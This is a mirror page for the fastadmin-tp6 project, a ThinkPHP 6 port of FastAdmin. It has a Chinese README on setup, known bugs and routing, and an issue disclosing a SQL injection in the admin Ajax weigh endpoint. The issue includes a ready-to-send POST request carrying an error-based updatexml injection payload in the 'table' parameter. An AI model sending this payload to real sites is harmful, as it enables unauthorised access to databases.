Giter Club home page Giter Club logo

fastadmin-tp6's Introduction

##FastAdmin ThinkPHP 6.0 tp6版本还在测试中,不适合商用,仅供学习使用

运行环境要求PHP7.1+。

克隆本仓库代码 git clone https://github.com/che-my/fastadmin-tp6.git
安装依赖 composer install
tp6推荐使用环境变量env
cp .example.env .env

调试模式 
APP_DEBUG = true

trace调试模式,tp6已结做成全局中间件服务,需要在app\middleware.php文件里吧注释trace的服务那里取消注释就行

在线体验

fastadmin升级tp6,

有以下BUG 暂待解决

1.插件模块暂时使用不了

2.在线命令管理模块,默认自定义控制器名称和自定义模型 这2个地方留空是正常的,能生成代码,但是有可能还是会有部分bug存在,建议还是自己手动写写代码也好

3.以上2个bug,由于本人能力有限,修改力不从心,希望大家一起来参与修改更新

4.其它bug,暂未发现

由于tp6的模块应用下的文件夹的控制器访问方式

tp6路由
/模块/自定义文件夹/控制器/方法 访问失败,
统一转为:/模块/自定义文件夹.控制器/方法
例如 /admin/test/index/index ->访问失败
改成 /admin/test.index/index ->访问成功

tp6文档

完全开发手册

fastadmin文档

fastadmin开发文档

版权信息

ThinkPHP遵循Apache2开源协议发布,并提供免费使用。

本项目包含的第三方源码和二进制文件之版权信息另行标注。

版权所有Copyright © 2006-2019 by ThinkPHP (http://thinkphp.cn)

All rights reserved。

ThinkPHP® 商标和著作权所有者为上海顶想信息科技有限公司。

更多细节参阅 LICENSE.txt

fastadmin-tp6's People

Contributors

che-my avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar

fastadmin-tp6's Issues

Fastadmin-tp6 SQL injection

When a user with administrator rights has logged in the background, SQL injection can be performed during sorting by constructing malicious data.
In file app/admin/controller/Ajax.php line 145,the 'table' parameter passed in here is not filtered,so we can pass a malicious parameter for SQL injection.
POC:

POST /admin/ajax/weigh HTTP/1.1
Host: ***.***
Connection: close
Content-Length: 122
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


ids=1&changeid=8&pid=3&field=weigh&orderway=desc&table=user_rule where if(1=2,1,updatexml(1,concat(0x7e,user(),0x7e),1))--

Example:
Fastadmin SQL Injection

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.